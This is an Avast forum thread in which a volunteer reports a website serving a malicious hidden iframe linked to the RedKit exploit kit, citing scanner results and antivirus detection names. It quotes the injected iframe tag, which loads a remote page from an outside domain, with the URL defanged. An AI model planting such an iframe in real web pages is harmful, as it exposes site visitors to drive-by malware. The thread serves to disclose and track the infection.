Author Topic: Malicious iFrames detected here?  (Read 1443 times)

0 Members and 1 Guest are viewing this topic.

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33897
  • malware fighter
Malicious iFrames detected here?
« on: May 22, 2015, 12:00:30 AM »
See: http://killmalware.com/eboipatra.com/#
See: https://www.virustotal.com/nl/url/5b4a8cc89a71ce1a62273176706b12458468c282b899bc7af66b30169f2fb2e7/analysis/#additional-info
See: /index.html
Severity:   Malicious
Reason:   Detected malicious hidden iframe.
Details:   Malicious hidden iframe leading to RedKit exploit kit
Offset:   47911
See:
Code: [Select]
[[<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=htxp://adventurous.com/achd.html?i=1949896>]]  Domain detected on spam or phishing campaigns. Details: http://sucuri.net/malware/entry/MW:HTA:7
This specific URL was identified in malicious campaigns to disseminate malware.

Web application version:
WordPress version: WordPress 3.5.1
WordPress directory: htxp://adventurous.com/wp-content
WordPress theme: htxp://adventurous.com/wp-content/themes/adventurous/
WordPress version outdated: Upgrade required.
Outdated WordPress Found: WordPress Under 4.2

polonus
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline Pondus

  • Probably Bot
  • ****
  • Posts: 37527
  • Not a avast user

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33897
  • malware fighter
Re: Malicious iFrames detected here?
« Reply #2 on: May 22, 2015, 03:44:52 PM »
Thanks Pondus, good to find we have protection,

D
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!

Offline polonus

  • Avast Überevangelist
  • Probably Bot
  • *****
  • Posts: 33897
  • malware fighter
Re: Malicious iFrames detected here?
« Reply #3 on: May 25, 2015, 05:16:20 PM »
Update, the threat as up until now still exists. See: http://killmalware.com/eboipatra.com/#
DrWeb flags as Checking: htxp://eboipatra.com
Engine version: 7.0.12.3050
Total virus-finding records: 5988388
File size: 46.94 KB
File MD5: 05a73beb92c287c3585540433fec4f25

htxp://eboipatra.com infected with JS.IFrame.480
Threat also found on sedo parking sites. Avast detects as HTML:Iframe-BSP [Trj].

pol
Cybersecurity is more of an attitude than anything else. Avast Evangelists.

Use NoScript, a limited user account and a virtual machine and be safe(r)!